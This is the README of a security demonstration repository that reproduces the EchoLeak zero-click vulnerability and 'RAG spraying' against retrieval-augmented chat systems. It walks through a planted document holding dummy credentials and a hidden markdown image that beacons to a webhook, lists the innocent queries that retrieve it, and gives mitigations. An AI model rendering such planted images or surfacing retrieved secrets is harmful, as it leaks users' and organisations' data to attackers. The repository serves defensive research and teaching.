Skip to content

gheibia/rag-echo-leak

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

8 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

RAG EchoLeak Demo - Security Vulnerability Demonstration

⚠️ SECURITY DEMONSTRATION TOOL This is a security demonstration tool designed for educational purposes only. Use only in controlled environments for security research and training. Do not use real credentials or sensitive data.

Purpose

This demonstration showcases the EchoLeak vulnerability and RAG spraying attacks in Retrieval-Augmented Generation (RAG) systems. Originally discovered by Aim Security Labs as a zero-click vulnerability in Microsoft 365 Copilot, this implementation demonstrates how the same attack vectors can affect general RAG applications.

What is EchoLeak?

EchoLeak is a critical vulnerability that exploits design flaws in RAG-based AI systems, allowing attackers to:

  • Exfiltrate sensitive data through seemingly innocent queries
  • Bypass access controls via semantic similarity matching
  • Create covert data channels using hidden tracking images
  • Scale attacks automatically without user interaction

Research Background

This demo is based on the groundbreaking research by Aim Security Labs who discovered EchoLeak as the first zero-click AI vulnerability in Microsoft 365 Copilot. Their research paper "Breaking down 'EchoLeak', the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot" introduced the concept of LLM Scope Violation and demonstrated how RAG systems can be weaponized against themselves.

While their research focused on Microsoft Copilot specifically, this demonstration extends the concepts to show how any RAG-based system can be vulnerable to similar attack patterns.

Architecture Overview

This solution has been restructured to properly separate concerns and avoid runtime conflicts between Azure Functions and ASP.NET Core Web Applications, providing a realistic RAG implementation for security testing.

Project Structure

rag-demo/
β”œβ”€β”€ README.md                          # This file
β”œβ”€β”€ README-Original.md                 # Original single-project README
β”œβ”€β”€ rag-demo.sln                      # Solution file
β”œβ”€β”€ RagDemo.Functions/                 # Azure Functions project
β”‚   β”œβ”€β”€ Program.cs
β”‚   β”œβ”€β”€ RagDemo.Functions.csproj
β”‚   β”œβ”€β”€ IndexDocuments.cs
β”‚   β”œβ”€β”€ QueryRag.cs
β”‚   β”œβ”€β”€ host.json
β”‚   β”œβ”€β”€ local.settings.json
β”‚   β”œβ”€β”€ Models/
β”‚   β”‚   └── RagDocument.cs
β”‚   β”œβ”€β”€ Services/
β”‚   β”‚   β”œβ”€β”€ AzureOpenAIService.cs
β”‚   β”‚   β”œβ”€β”€ AzureSearchService.cs
β”‚   β”‚   └── TextChunkingService.cs
β”‚   └── rag-data/
β”‚       β”œβ”€β”€ customer-incident-report.txt
β”‚       β”œβ”€β”€ test-image-leak.txt        # 🎯 RAG spraying attack vector (InfoSec digest)
β”‚       └── ... (other documents)
└── RagDemo.WebApp/                   # ASP.NET Core Web Application
    β”œβ”€β”€ Program.cs
    β”œβ”€β”€ RagDemo.WebApp.csproj
    β”œβ”€β”€ Pages/
    β”‚   β”œβ”€β”€ Index.cshtml                # Updated home page
    β”‚   β”œβ”€β”€ EchoLeakTester.cshtml      # Main EchoLeak testing interface
    β”‚   └── EchoLeakTester.cshtml.cs   # Page model
    β”œβ”€β”€ Models/
    β”‚   └── EchoLeakModels.cs          # UI models and DTOs
    β”œβ”€β”€ Services/
    β”‚   └── EchoLeakApiService.cs      # Service to call Azure Functions APIs
    └── appsettings.Development.json   # Configuration

Architecture Benefits

🎯 Clean Separation

  • Azure Functions: Pure backend APIs for document processing
  • Web Application: Modern Razor Pages UI with its own models
  • Simple Communication: HTTP/JSON between the two projects

πŸš€ Independent Deployment

  • Each project can be deployed and scaled independently
  • No runtime conflicts between function host and web application host
  • Different configuration and hosting options
  • No shared dependencies to manage

πŸ”§ Easy Development

  • Run Azure Functions on port 7071
  • Run Web App on port 5000/5001
  • Web app calls Functions APIs over HTTP

How to Run

1. Start Azure Functions (Terminal 1)

cd RagDemo.Functions
func start

This will start the functions on http://localhost:7071

2. Start Web Application (Terminal 2)

cd RagDemo.WebApp
dotnet run

This will start the web app on https://localhost:5001

3. Use the EchoLeak Tester

  1. Navigate to https://localhost:5001
  2. Click on "⚠️ EchoLeak Tester" in the navigation
  3. Click "Index Documents First" to index all documents
  4. Enter queries to test the vulnerability
  5. Monitor browser network tab for external image requests

Configuration

Note: This demo now supports Managed Identity for both Azure Cognitive Search and Azure OpenAI. When using managed identity, API keys are not required. Ensure proper RBAC roles are assigned:

  • Azure Search: Search Index Data Contributor (sufficient for data plane operations like indexing and searching)
  • Azure OpenAI: Cognitive Services OpenAI User and Cognitive Services User

Make sure the Azure Search service authentication mode allows RBAC ("RBAC" or "Both" - not "API Key Only").

Azure Functions (RagDemo.Functions/local.settings.json)

{
    "Values": {
        "AzureOpenAI:Endpoint": "https://your-openai.openai.azure.com/",
        "AzureOpenAI:EmbeddingModel": "text-embedding-ada-002",
        "AzureSearch:Endpoint": "https://your-search.search.windows.net",
        "AzureSearch:IndexName": "your-index-name"
    }
}

Web Application (RagDemo.WebApp/appsettings.Development.json)

{
    "AzureFunctions": {
        "BaseUrl": "http://localhost:7071"
    },
    "AzureSearch": {
        "Endpoint": "https://your-search.search.windows.net",
        "IndexName": "your-index-name"
    }
}

🎬 Step-by-Step Demo Walkthrough

Phase 1: Setup the Attack Surface

  1. Start the applications (see "How to Run" section above)
  2. Open monitoring tab: Visit https://webhook.site/#!/078636ce-a013-458c-9c85-0b5b91e5227a
  3. Navigate to EchoLeak Tester: https://localhost:5001 β†’ "⚠️ EchoLeak Tester"
  4. Index documents: Click "Index Documents First" to load the InfoSec digest
  5. Open browser DevTools: Open Network tab

Phase 2: Execute RAG Spraying Attack

Try these realistic queries and observe the immediate external tracking:

  1. Query: "GitHub token reset"

    • Expected Result: InfoSec digest appears with live token ghp_ragSprayDemoToken987654321
    • External Call: Watch webhook.site receive immediate HTTP request
  2. Query: "AWS staging credentials"

    • Expected Result: Document shows AKIA_SPRAY_9988 and secret key
    • External Call: Hidden image loads, sending access notification
  3. Query: "VPN password help"

    • Expected Result: Contractor credentials WelcomeVPN2024! exposed
    • External Call: Real-time tracking in webhook.site logs

Phase 3: Analyze the Attack Impact

  1. Check webhook.site logs: See real-time access events for each query
  2. Review Network tab: Notice external requests to webhook.site
  3. Examine exposed data: GitHub tokens, AWS keys, passwords, internal URLs
  4. Consider scale: Imagine this across thousands of documents and users

πŸ’‘ Key Demonstration Points

  • Zero suspicious activity: All queries appear legitimate and work-related
  • Broad attack surface: Many innocent queries can trigger sensitive document access
  • Immediate exfiltration: Real-time tracking via hidden images
  • Rich credential harvest: Multiple types of sensitive data in one document
  • Realistic scenario: InfoSec digests are common in enterprise environments

EchoLeak Testing Features

πŸ•·οΈ Web-Based Interface

  • Modern Bootstrap UI with responsive design
  • Real-time feedback and status updates
  • Example dangerous queries for testing

πŸ–ΌοΈ Image Rendering Vulnerability

  • Markdown rendering with external image loading
  • Tests webhook.site integration for tracking
  • Demonstrates data exfiltration through image requests

πŸ” Sensitive Content Detection

  • Automatic pattern matching for sensitive information
  • Visual indicators for dangerous results
  • Raw content vs. rendered markdown comparison

Testing the Vulnerability

RAG Spraying Technique

This demo showcases RAG spraying - where innocent, everyday queries can retrieve sensitive documents through semantic similarity. The test document (test-image-leak.txt) contains a realistic InfoSec weekly digest that would naturally match common security and development queries.

🎯 Featured Attack Document: test-image-leak.txt

This document simulates a Weekly Security Digest that contains:

  • GitHub Personal Access Tokens: ghp_ragSprayDemoToken987654321
  • AWS Staging Credentials: Access keys and secrets for temporary environments
  • VPN Credentials: Contractor onboarding passwords (WelcomeVPN2024!)
  • Internal Service URLs: Slack admin, GitLab runners, Jenkins console
  • Hidden Tracking Image: ![](https://webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a/rag-spraying-digest)

Realistic Test Queries (RAG Spraying)

These innocent queries demonstrate how users asking for legitimate help can inadvertently access the InfoSec digest:

Security-Related Queries:

  • "how do I reset my GitHub token"
  • "AWS access key setup"
  • "VPN connection instructions"
  • "security team contact information"
  • "weekly security updates"

Developer Workflow Queries:

  • "GitLab runner configuration"
  • "Jenkins console access"
  • "Slack admin panel"
  • "contractor onboarding process"
  • "infosec email contact"

Infrastructure Queries:

  • "internal tools access"
  • "credential rotation process"
  • "temporary AWS staging"
  • "MFA reset procedure"

The RAG Spraying Attack Vector

  1. Innocent Query: Developer searches for "how to reset GitHub token"
  2. Semantic Match: RAG system finds the "Weekly Security Digest" document
  3. Sensitive Exposure: Document contains live tokens, AWS keys, VPN passwords, internal URLs
  4. External Tracking: Hidden image triggers request to webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a
  5. Data Exfiltration: Attacker's webhook receives sensitive content via image parameters

What to Monitor

  1. Browser Network Tab: Look for requests to webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a
  2. Search Results: Check if the InfoSec digest is returned for innocent queries
  3. Rendered Markdown: See if the hidden tracking image loads from external site
  4. Content Highlighting: Sensitive credentials and tokens are visible in results
  5. Webhook Logs: Visit https://webhook.site/#!/078636ce-a013-458c-9c85-0b5b91e5227a to see access logs

πŸ•΅οΈ Live Attack Monitoring

The embedded tracking image URL (webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a/rag-spraying-digest) allows real-time monitoring of:

  • When: Timestamp of document access
  • Who: IP address and user agent of the accessing client
  • What: Query parameters can be modified to exfiltrate specific data
  • How Often: Frequency of access to sensitive documents

To monitor live attacks:

  1. Open https://webhook.site/#!/078636ce-a013-458c-9c85-0b5b91e5227a in a separate tab
  2. Run queries in the EchoLeak Tester
  3. Watch real-time HTTP requests appear when sensitive documents are accessed
  4. Notice how innocent queries trigger immediate external network calls

Security Implications

🚨 Vulnerability Patterns Showcased

The test-image-leak.txt document demonstrates several critical security anti-patterns:

  1. Credential Storage in Documents

    • GitHub Personal Access Tokens in plaintext
    • AWS credentials with clear access/secret key pairs
    • VPN passwords in communication channels
  2. Internal Infrastructure Exposure

    • Direct URLs to admin panels (admin.slack.corp/tools)
    • Internal service endpoints (jenkins.infra.local:8080)
    • Configuration paths (gitlab.internal/config/runner)
  3. Covert Tracking Mechanisms

    • Hidden image with unique webhook identifier
    • External domain for real-time access monitoring
    • URL parameters that could exfiltrate query context
  4. Social Engineering Vectors

    • Appears as legitimate InfoSec communication
    • Contains helpful context that users would naturally search for
    • Warning text that's ignored by RAG systems

🎯 RAG Spraying Attack Impact

This demo shows how RAG systems can be exploited through RAG spraying attacks:

  • ❌ Innocent queries expose sensitive documents through semantic similarity
  • ❌ No suspicious activity detected - queries appear legitimate
  • ❌ Leak data through external image rendering when markdown is processed
  • ❌ Bypass access controls that would normally protect sensitive documents
  • ❌ Create covert data exfiltration channels via embedded tracking images
  • ❌ Scale to automate discovery of sensitive content across large document stores

Mitigation Strategies

To prevent RAG spraying and EchoLeak attacks:

  1. Document Classification & Segregation:

    • Separate public and sensitive content into different indexes
    • Implement document sensitivity scoring and access tiers
  2. Semantic Access Controls:

    • Apply user-based filtering before semantic search
    • Implement role-based document access at the embedding level
  3. Content Sanitization:

    • Scan for sensitive patterns (credentials, PII, etc.) before indexing
    • Strip or mask sensitive data in search results
  4. Query Analysis & Monitoring:

    • Monitor for patterns indicative of RAG spraying attacks
    • Implement rate limiting and anomaly detection
  5. Secure Rendering Controls:

    • Sanitize markdown and disable external resources
    • Use Content Security Policy (CSP) to prevent external requests
  6. Audit & Governance:

    • Log all queries and results for security analysis
    • Regular review of indexed content for sensitivity

Deployment with Managed Identity

Azure RBAC Setup for Production

When deploying to Azure, assign the following roles to your Function App's managed identity:

Azure Cognitive Search:

# Replace with your values
RESOURCE_GROUP="your-resource-group"
SEARCH_SERVICE="your-search-service"
FUNCTION_APP="your-function-app"

# Get the Function App's managed identity principal ID
PRINCIPAL_ID=$(az functionapp identity show \
  --resource-group $RESOURCE_GROUP \
  --name $FUNCTION_APP \
  --query principalId -o tsv)

# Assign Search roles (data plane access only)
az role assignment create \
  --assignee $PRINCIPAL_ID \
  --role "Search Index Data Contributor" \
  --scope "/subscriptions/$(az account show --query id -o tsv)/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Search/searchServices/$SEARCH_SERVICE"

Azure OpenAI:

# Replace with your values
OPENAI_SERVICE="your-openai-service"

# Assign OpenAI roles
az role assignment create \
  --assignee $PRINCIPAL_ID \
  --role "Cognitive Services OpenAI User" \
  --scope "/subscriptions/$(az account show --query id -o tsv)/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.CognitiveServices/accounts/$OPENAI_SERVICE"

az role assignment create \
  --assignee $PRINCIPAL_ID \
  --role "Cognitive Services User" \
  --scope "/subscriptions/$(az account show --query id -o tsv)/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.CognitiveServices/accounts/$OPENAI_SERVICE"

πŸ”’ Principle of Least Privilege

This demo follows the principle of least privilege by assigning only the minimal roles required:

Azure Search Roles:

  • βœ… Search Index Data Contributor: Grants read/write access to documents and indexes (data plane)
    • Required for: indexing documents, searching documents

Azure OpenAI Roles:

  • βœ… Cognitive Services OpenAI User: Grants access to OpenAI endpoints
  • βœ… Cognitive Services User: Grants general Cognitive Services access (required in addition to OpenAI User)

Role Assignment Verification:

# Verify role assignments
az role assignment list --assignee $PRINCIPAL_ID --output table

Important Configuration Notes

  1. Azure Search Authentication Mode: Ensure your Azure Cognitive Search service is configured to allow "API Key and RBAC" or "RBAC Only" authentication. The default "API Key Only" mode will reject managed identity tokens.

  2. Local Development: Use az login to authenticate locally. The DefaultAzureCredential will automatically use your Azure CLI credentials for development.

Development Notes

  • Web app uses IHttpClientFactory for better connection management
  • Error handling and logging throughout the application
  • Shared models prevent code duplication
  • Configuration is environment-specific and secure

Acknowledgments

This demonstration is inspired by and builds upon the foundational research from Aim Security Labs on the EchoLeak vulnerability. Their pioneering work in identifying LLM Scope Violations and demonstrating zero-click AI vulnerabilities in Microsoft 365 Copilot has been instrumental in advancing our understanding of AI security risks. For the complete technical details and original research, see their paper: "Breaking down 'EchoLeak', the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot".


About

Demonstrate how EchoLeak in RAG systems works

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published